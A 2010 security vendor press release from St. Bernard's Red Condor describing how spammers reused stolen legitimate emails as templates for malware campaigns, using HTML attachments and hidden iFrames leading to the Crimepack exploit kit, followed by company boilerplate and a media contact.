SAN DIEGO, CA--(Marketwire - October 1, 2010) - St. Bernard's Red Condor (
Unbeknownst to email users everywhere, mail messages are being stolen and used against them for nefarious reasons. The sole purpose of this activity is to deliver malware for which there are seldom methods of detection or remediation.
A group of spammers had been suspected of using stolen emails as templates for their malicious email campaigns for several months, and recently a sample was obtained that had sufficient detail to track the message back to its source. The message appeared to come from a religious organization in San Francisco, California. The message purported to be an invitation to an annual festival the organization was hosting on September 19, 2010. Included with the email was an HTML attachment containing obfuscated JavaScript.
"We contacted the organization to ask about the event and its email marketing efforts," said Mary Mizrahi, product manager at St. Bernard. "We confirmed that this organization had sent emails to a specific list of contacts with a PDF attachment that contained more information about the event. The event, however, was actually on September 12, 2010, and the organization's legitimate email invitations had been sent well in advance of the event and prior to when the spam message had been captured. The content of the spam messages was verified to be extremely similar to the content of emails sent by the organization."
Mizrahi added, "St. Bernard's Red Condor has mentioned several times in recent news releases and blog posts that we believed cybercriminals were stealing actual emails to use as spam templates and employing exploit kits. We now have very strong evidence that this is in fact the case. The more genuine the email appears, the more likely they can circumvent spam filters and coerce users to click on links and attachments. Exploiting a user's curiosity has long been an effective mainstay tactic for spam with malicious intent. This is a sobering reminder that a seemingly benign action like opening an HTML attachment from an apparently misdirected email can have catastrophic repercussions."
For the religious organization's messages, it appears that spammers stole the original email from a compromised PC for the specific purpose of using it as a spam template. They changed the date to make it current, and replaced the legitimate PDF attachment with a malicious payload. The technique that we named Plug-n-Play (PNP) is the use of an attachment or URL in a spam message which causes the recipient's browser to interact with an exploit kit or drive-by download, followed by a subsequent redirect to another page. These PNP campaigns are designed to install malware, including Trojans and root-kits. The infections resulting from previous PNP attacks likely provided the spammers with the conduit to access these private emails for use in the next wave of attacks.
While this particular case allowed St. Bernard's Red Condor to verify the legitimate origins of the message turned spam template, there have been several dozen, if not hundreds of other messages used by this spam gang that are likewise suspected of being pilfered from the hard-drives of compromised personal computers. The privacy implications of this ongoing technique are disconcerting at a minimum.
Spammers continue to experiment with the novel technique. A few days after the campaign that exposed the religious organization's message, another wave of campaigns ensued. This time the HTML attached to the message sourced from stolen emails consisted of spoofs of email notifications from a variety of well-known brands including Xbox Live, Facebook, Twitter, Netflix, StumbleUpon, Picasa, eBay and PayPal. Once the HTML attachment was opened in a browser revealing a familiar service notification, an invisible iFrame tag caused the browser to interact directly with an exploit kit known as Crimepack -- a well known criminal software package that allows an attacker to remotely attempt multiple exploits against a victim's browser. Upon finding a successful exploit, the kit implants a myriad of malware onto the victim's machine which can be done without any indication that the computer has become compromised. Unfortunately, most anti-virus software cannot reliably detect the malicious activity. Fresh samples are rarely recognized by more than 15% of the 43 major AV engines, according to VirusTotal scans.
Visit St. Bernard's Red Condor Security Alerts blog for more details on these campaigns.
About St. Bernard Software
St. Bernard Software develops and markets Internet security appliances and services that empower IT professionals to effectively, efficiently and intelligently manage their enterprise's Internet-based resources. Originally founded in 1995 as a market-leader in data security with its flagship product, Open File Manager™, the company is now recognized for delivering today's #1 Web filtering and security appliance, iPrism®. With millions of end users worldwide in more than 5,000 enterprises, educational institutions, SMB, and government agencies, St. Bernard strives to deliver simple, high performance solutions that offer excellent value to our customers.
Based in San Diego, California, St. Bernard (
About Red Condor
Red Condor's highly accurate email filter Vx Technology™ hybrid architecture and fully managed appliances lead to a dramatic reduction in the cost of owning a premium spam filter. With email security solutions for small-to-medium businesses, as well as for ISPs with millions of email inboxes, Red Condor is rapidly gaining market share. The company's email security system has built-in zero tolerance for lost email, and a near zero false-positive rate, with spam block rates that exceed 99%. Red Condor Archive is a secure message archiving service with lifetime retention and unlimited storage. The company's award-winning technology is backed 24/7 by a team of human email security experts monitoring for the latest email threats. For more information, visit www.redcondor.com.
(C)2010 St. Bernard Software Inc. All rights reserved. The St. Bernard Software logo, iPrism, iGuard, the Red Condor Logo, and Vx Technology are trademarks of St. Bernard Software Inc. All other trademarks and registered trademarks are hereby acknowledged.
Contact Information:
Media contact:
Lorrie Hunsaker
St. Bernard
(858) 524-2041